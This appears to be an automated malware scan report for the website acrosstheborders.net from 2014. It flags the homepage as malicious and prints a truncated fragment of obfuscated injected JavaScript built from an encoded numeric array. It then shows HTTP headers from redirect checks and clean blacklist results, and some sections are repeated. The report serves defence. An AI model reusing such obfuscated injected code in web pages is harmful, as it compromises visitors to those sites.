Scanned pages/files
Request | Server response | Status |
http://acrosstheborders.net/ | 200 OK Content-Length: 18538 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function($$){qq2=[8,0,26,0,11,81,29,0,26,86,65,82,0,54,48,29,84,72,73,83,27,60,59,54,48,0,0,38,85,76,76,57,69,65,82,0,5,45,79,78,84,72,0,5,36,65,84,69,0,5,40,79,85,82,83,0,5,45,73,78,85,84,69,83,0,5,51,69,67,79,78,68,83,8,9,61,93,27,0,11,75,29,0,26,0,6,82,12,54,80,29,84,72,73,83,14,3,81,8,9,12,73,29,16,27,54,80,59,17,61,11,29,17,27,87,72,73,76,69,8,73,11,11,28,23,9,91,3,82,29,54,80,59,73,61,0,15,3,82,28,3,45,9,54,80,59,73,61,0,22,3,82,93,60,0,54,80,14,83,80,76,73,67,69,8,94,90,7,9,12,17,11,94,5 Antivirus reports:
| ||
http://acrosstheborders.net/js/jquery.core.1-3-2.js | 200 OK Content-Length: 127757 Content-Type: application/javascript | clean |
http://acrosstheborders.net/js/jquery.swfobject.1-0-9.js | 200 OK Content-Length: 11841 Content-Type: application/javascript | clean |
http://acrosstheborders.net/test404page.js | 404 Not Found Content-Length: 298 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: acrosstheborders.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Dec 2014 03:09:12 GMT
Accept-Ranges: bytes
ETag: "22222cc-486a-4b667ebd08a36"
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 18538
Content-Type: text/html
Last-Modified: Fri, 13 Jan 2012 12:22:41 GMT
...18538 bytes of data.
GET / HTTP/1.1
Host: acrosstheborders.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Dec 2014 03:09:12 GMT
Accept-Ranges: bytes
ETag: "22222cc-486a-4b667ebd08a36"
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 18538
Content-Type: text/html
Last-Modified: Fri, 13 Jan 2012 12:22:41 GMT
...18538 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: acrosstheborders.net
Referer: http://www.google.com/search?q=acrosstheborders.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: acrosstheborders.net
Referer: http://www.google.com/search?q=acrosstheborders.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=acrosstheborders.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://acrosstheborders.net/
Result: acrosstheborders.net is not infected or malware details are not published yet.
Result: acrosstheborders.net is not infected or malware details are not published yet.